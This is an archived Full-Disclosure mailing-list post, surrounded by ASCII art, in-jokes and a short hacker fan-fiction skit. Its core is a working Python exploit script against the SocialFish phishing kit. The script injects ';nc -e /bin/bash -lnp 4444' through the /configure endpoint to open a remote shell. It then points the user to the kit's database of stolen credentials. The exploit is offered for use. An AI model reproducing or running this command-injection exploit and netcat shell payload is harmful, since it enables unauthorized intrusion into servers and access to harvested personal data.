lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 31 Jan 2022 05:29:19 +0000
From: Knights of Nynex via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] The Knights of NYNEX presents: Morgawr's feast

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# usage: ./morgawrsfeast.py http://phishingsiteurl
text='''
-o==[=====><=====]=o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o-

                                    ████
                                    ██████
                                    ██████
                                      ██
                                      ██
                ██████                ▓▓                  ██
                ██████                ██                ██████
                  ██▓▓                ██                ██████
                    ▓▓                ██                ▒▒
                    ██              ████                ▓▓
                    ██              ██████            ██▓▓
                    ████            ██████          ▓▓████                  ██
  ▓▓                ██████        ████████          ████▓▓                ██████
██████              ████████    ▓▓██████████      ████████                ██████
██████              ██████████████████████████████████████               ██
    ██            ▓▓██████████████████████████████████████              ██
      ██          ██████████████████████████████████████████          ████
      ████████▓▓████████████████████████████████████████████████████████
      ██████████████████████████████████████████████████████████████████
        ██████████████████████████████████████████████████████████████
        ██████████████████████████████████████████████████████████████
          █████████████████████ _  _ _ _   __  █████████████████████
          ████████▓▓           [|\|\\/[|\|[|-\\/          ▓▓████████
         .o oOOIOOOOo              ''      `-''`                 OOOo
         Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOIOO
         OboO"""""""""""".OOo. .oOIIOOo.    OOOo.oOOOOOo.."""""""""'DO
         OOP.oIIIOOOOOOOO "0OOOOVOOOOOOo.   `"OOVIIIOOOP,OOOOOOOOOOOO'
         `O'OOOO'     `OOOOo"OOOOOHTPOOO` .adOOOOOOOOO"oOOO'    `OOOoo
         .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
         OOOOO                 '"OOOOOOOOOOHTPOOO"`                oOO
        oOOOOOba.                .adOOOOOOOOOOba               .adOOTOo.
       oOOOOOXIIIOOOOba.    .adOOOXXIOOOO@...OOOOOba.     .adOOOOOOOOOOOO
      OOOOHTPOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOXXXIVOOOO.OOOOOOOOOOOOOO
      "OOOO"       "YOoOOKNIGHTSODOO"`  .   '"OOOONYNEXOOOoOY"     "HTP"
         Y           'OOOOOOOOOOOOOO: .oOFo. :OOOOOOOOOOO?'         :`
         :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOLVOOOOO?         .
         .            oOOP"%OOOOOOOOoOOOOOOO?oOO2^p-1OOOO"OOo
                      '&o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                           `$"  `OOOO' `O"Y ' `OHTP'  o             .
         .                  .     OP"          : o     .
                                   :
                                   .                             4E 59 4E 45 58
            _
  _        | |
 | |_______|  \-~--~~~-----^^^^^^^-------------~~~~~~~~~~~~~~~~~--------------\
 |m|_______|  =[ The Knights of NYNEX presents: Morgawr's feast ]==============>
 |_|       |  /-----vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv~~~~~~~~~~~~~~~~~~~~~~~~~~~/
           |_|
'''
m='''
-[------->+<]>++.+++.-----.--.+.>-[--->+<]>-.-.+[--->+<]>++++.[-->+++++<]>-.----

-o==[=====> META <=====]==o-
Is it a bird? is it a plane? No, it's another lame phisher about to get pwned!
 - https://github.com/UndeadSec/SocialFish/


          A
         /!\
        / ! \
 /\     )___(    This is our world now. The world of the electron and the switch
(  `.____(_)_________
|           __..--""          the beauty of the baud.
(       _.-|
 \    ,' | |      We exist without nationality, skin color, or religious bias
  \  /   | |
   \(    | |
    `    | |
         | |

>>> Look, you wanna be elite? You gotta do a righteous hack

6851cf3c6851cf3c6851cf3c6851cf3c6851cf3c6851cf3c6851cf3c6851cf3c6851cf3c6851cf3c

-o==[=====> FANMAIL <=====]==o-
FM: You're awesome
KN: You're awesome!

FM: Your vulns are lame
KN: Thanks? We hope you'll publish some better ones

FM: Please give us free 0day in widely used software
KN: lol, find it yourself!

FM: ...
KN: Easter eggs

-o==[=====> FANFIC <=====]==o-
Scene:
The aging security weenie picks up the SOC phone mutters something and hangs up.
He stands and walks to a door labelled "CISO" where he knocks and opens the
door.

Weenie: "Mr Bontchy sir?

Vesson: "How many times do I have to tell you, call me 'Vesson'!"

Weenie: "Mr Vesson sir, your contact is here, waiting outside"

Vesson: "Finally, I was getting worried. Here, hold this bag for me. Having to
pay in cash is so mundane. It would have been so much easier if he'd accepted my
offer of disinterested primates."

They leave the office together.

Scene: Outside the Ellingson Minerals Headquarters Override meets with a person
dressed in a black polo, ripped jeans and Vibram finger toe shoes.

Vesson: "Have you got what I requested?"

Mystery person: "I got you something better. My guy in Singapore for sanctioned
so I had to get one from down under. But it's superior quality, the guy is a
genius, somewhat of a classical composer of exploits."

Vesson smiles and nods to himself, and swaps the bag for a large envelope.

Mystery person: "I threw in a freebie for you, it's a hackable USB cable.
The real version, not the crappy copy being sold by a certain 'Mr. Famous'."

Scene:
Cut to Vesson returning to the SOC with a large paper envelope.

Weenie: "Did you get what you needed?"

Vesson: "I sure did. These hackers won't know what hit them.
As browsers won't allow anti virus hooks, there's nothing that will catch this until its too late!"

Vesson laughs

Scene:
A young boy stands in the middle of his bedroom, wearing a VR headset while
pointing his hands around, clearly engaged in a game.

There's a knock on the door and an older girl enters

Girl: "Hey, dad says uncle Joey is coming over to watch the razor and blade livestream,
and then that Australian doctor that greps the Linux kernel"

Boy, sighs: "All they do is get drunk and yell 'HACK THE PLANET'

Girl: "Anyway so we're getting pizza, I guess you'll want Hawaiian"

Boy: "Of course, pineapple belongs on pizza!
At least Cereal used to tell great stories, but he doesn't come around anymore.
Dad says it has something to do with 'Book club' whatever that means."

Scene:
A figure sits in a dark room, the screen and keyboard lights are the main source of illumination
Fingers with bright colour nails type on a keyboard, cut to the screen where an email address is being typed in
To: Vesson@...intrerestedprimates.club
Subject: I know what you did

Where are your primates now scum?

-o==[=====> EXPLOIT <=====]==o-
'''
import requests
import sys
import time

print(text)

if (len(sys.argv) < 2):
    print("RTFM already!")
    exit(1)
shell=";nc -e /bin/bash -lnp 4444;echo pwned_by_knights_of_nynex"
url="https://github.com/UndeadSec/SocialFish/"
payload={"url":url+shell,"red":"mess-with-the-best-die-like-the-rest","beef":"no","status":"clone"}
dn="Duunnn dunnn… duuuunnnn duun… duuunnnnnnnn dun dun dun dun dun dun dun dun dun dun dunnnnnnnnnnn dunnnn"
print("Hunting for some phish!");time.sleep(1)
print(dn)
print("Spotted a phishing site "+sys.argv[1]);time.sleep(1)
print(dn)
print("Foul their logic! Flip their boat! Bump! Bump! Bump!");time.sleep(1)
try:
    r = requests.post(sys.argv[1]+"/configure", data=payload,timeout=3)
except:
    print(dn)
print(dn);time.sleep(1)


print("Get inside! Feast on their flesh! Chomp! chomp! chomp!")
try:
    r = requests.get(sys.argv[1]+"/", timeout=3)
except:
    print(dn)
time.sleep(1)

print("\nThe phished shell should be listening on port 4444...")
print("remember to grab all the phish in the sqlite3 db: 'database.db'\n")
print('''
               _,.---*/0-0--.       _________________
           _ =*      (    o o)     / HACK THE PLANET! \
        _-~     _,.--'\ \vvvv   --(  HACK THE PLANET!  )
      _-      _:       \ \^^,      \ HACK THE PLANET! /
     =      _*          "--"        ------------------
   ."      =                             .
   :      :                              '=_. ___
   |      ;                                  '~--.~.
   ;      ;                                       } |
   =       \             __..-...__           ___/__/__
   :        =_     _.-~~          ~~--.__
~~~~\         ~-+-~                   ____~._______
     ~^v~~ == ...______ __ ___ _--~~--_
''')

text='''
-----.[-->+<]>---.[-->+++++<]>--.+++++++++++.-----------.---------.[->+++++<]>-.

-o==[=====> Respect <=====]==o-
LoD, gobbles, TESO, w00w00, ADM, 8lgm, L0pth, cDc, THC, ducksec
Phrack, tmp.Out, zf0, el8, h0n0

-o==[=====> SIG <=====]==o-
d19e36634f3734c5b22eb1f0b0897340a6ca6d370e96c21bcea22f5da6c41544c33714de3311c793
c1385259d6e95b951761e037dd614f87767da156d83b55b542b12b809ead24f5f867595c980971b7
42756d726562616879796176796d76636d76797075616e716e71767171796c2d6664686e67716e6c
bc7b1a763c450ef2a771722bbf69e72eef17d7d909d5c79a3ed2029ce51c5db1c6c4b8ed48d08aac
smazfe4c0606fe6b00263c8e0119e704f9abfa3c16062fcc185aabfa3c16062f371e6a0a3c04080c
67f1ee7a5b552b05c83d6d0b71007f75a79c4c0059d25500df7891da2d923c956a6a02a7cba50378
b45f71c650eb99f75d0deabc14f8ec6a5e5531d43bf00cfc3c545f491c0336b2e15083bb0f47d478
'''



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists